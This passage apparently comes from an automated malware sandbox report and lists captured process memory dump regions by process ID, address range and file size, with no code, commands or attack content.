                                                                                                                          64KB

                                                                                                                        • memory/548-87-0x0000027D55510000-0x0000027D5553B000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          172KB

                                                                                                                        • memory/548-81-0x0000027D55510000-0x0000027D5553B000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          172KB

                                                                                                                        • memory/564-38-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          32KB

                                                                                                                        • memory/564-41-0x00007FFB151E0000-0x00007FFB153E9000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          2.0MB

                                                                                                                        • memory/564-43-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          32KB

                                                                                                                        • memory/564-33-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          32KB

                                                                                                                        • memory/564-36-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          32KB

                                                                                                                        • memory/564-35-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          32KB

                                                                                                                        • memory/564-42-0x00007FFB142B0000-0x00007FFB1436D000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          756KB

                                                                                                                        • memory/564-34-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          32KB

                                                                                                                        • memory/644-48-0x000001BD00110000-0x000001BD0013B000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          172KB

                                                                                                                        • memory/644-54-0x000001BD00110000-0x000001BD0013B000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          172KB

                                                                                                                        • memory/644-55-0x00007FFAD5270000-0x00007FFAD5280000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          64KB

                                                                                                                        • memory/644-47-0x000001BD00110000-0x000001BD0013B000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          172KB

                                                                                                                        • memory/644-46-0x000001BD000E0000-0x000001BD00105000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          148KB

                                                                                                                        • memory/696-65-0x0000028D366E0000-0x0000028D3670B000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          172KB

                                                                                                                        • memory/696-59-0x0000028D366E0000-0x0000028D3670B000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          172KB

                                                                                                                        • memory/696-66-0x00007FFAD5270000-0x00007FFAD5280000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          64KB

                                                                                                                        • memory/772-14-0x00000000749C0000-0x0000000075171000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          7.7MB

                                                                                                                        • memory/772-700-0x00000000749C0000-0x0000000075171000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          7.7MB

                                                                                                                        • memory/772-699-0x00000000749C0000-0x0000000075171000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          7.7MB

                                                                                                                        • memory/772-321-0x0000000006C30000-0x0000000006C3A000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          40KB

                                                                                                                        • memory/772-13-0x00000000749C0000-0x0000000075171000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          7.7MB

                                                                                                                        • memory/784-92-0x000001CE841C0000-0x000001CE841EB000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          172KB

                                                                                                                        • memory/1000-70-0x000002CE5E5D0000-0x000002CE5E5FB000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          172KB

                                                                                                                        • memory/1000-77-0x00007FFAD5270000-0x00007FFAD5280000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          64KB

                                                                                                                        • memory/1000-76-0x000002CE5E5D0000-0x000002CE5E5FB000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          172KB

                                                                                                                        • memory/3000-31-0x00007FFB151E0000-0x00007FFB153E9000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          2.0MB

                                                                                                                        • memory/3000-30-0x000001E19C4F0000-0x000001E19C51A000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          168KB

                                                                                                                        • memory/3000-32-0x00007FFB142B0000-0x00007FFB1436D000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          756KB

                                                                                                                        • memory/3000-29-0x000001E19C160000-0x000001E19C182000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          136KB

                                                                                                                        • memory/3520-20-0x00000000749C0000-0x0000000075171000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          7.7MB

                                                                                                                        • memory/3520-0-0x00000000749CE000-0x00000000749CF000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          4KB

                                                                                                                        • memory/3520-7-0x0000000005E30000-0x0000000005E6C000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          240KB

                                                                                                                        • memory/3520-6-0x0000000005150000-0x0000000005162000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          72KB

                                                                                                                        • memory/3520-5-0x0000000004D00000-0x0000000004D66000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          408KB

                                                                                                                        • memory/3520-4-0x00000000749C0000-0x0000000075171000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          7.7MB

                                                                                                                        • memory/3520-3-0x0000000004C60000-0x0000000004CF2000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          584KB

                                                                                                                        • memory/3520-2-0x0000000005170000-0x0000000005716000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          5.6MB

                                                                                                                        • memory/3520-1-0x00000000000B0000-0x000000000011C000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          432KB